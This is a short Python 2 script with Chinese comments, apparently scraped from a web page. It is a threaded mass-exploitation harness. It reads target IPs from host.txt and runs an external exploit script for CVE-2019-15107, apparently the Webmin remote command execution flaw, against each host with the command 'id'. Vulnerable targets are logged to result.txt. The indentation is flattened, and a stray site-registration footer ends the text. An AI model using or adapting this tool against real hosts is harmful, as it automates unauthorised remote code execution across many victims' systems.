#coding:utf-8
import threading,Queue,sys,os
class RedisUN(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self._queue = queue
def run(self):
while True:
if self._queue.empty():
break
try:
########################## 代码放入这##################################
var = "success" #成功的标识,在CVE_2019_15107.py 成功的判断里增加 print("success")
url = 'https://'+ self._queue.get(timeout=0.5)
print(url)
r=os.popen('python CVE_2019_15107.py'+ " "+url+" "+"id") #调用的exp
text = r.read()#获取cmd打印的结果
if text == var:#当cmd输出结果出现success表示有漏洞,将结果存为result.txt
print(text)
f = open('result.txt','a+') #保存成功的结果
f.write(url + " "+text+"\n")
#####################################################################
except:
continue
def main():
thread_count = 10 #线程数
threads = []
queue = Queue.Queue()
f = open("host.txt",'r') #读取txt里的ip
sourceInLines = f.readlines()
f.close()
new = []
for line in sourceInLines:
temp1 = line.strip('\n')
queue.put(temp1)
for i in xrange(thread_count):
threads.append(RedisUN(queue))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
f1 = open('result.txt','w')
f1.close()
main()
浙公网安备 33010602011771号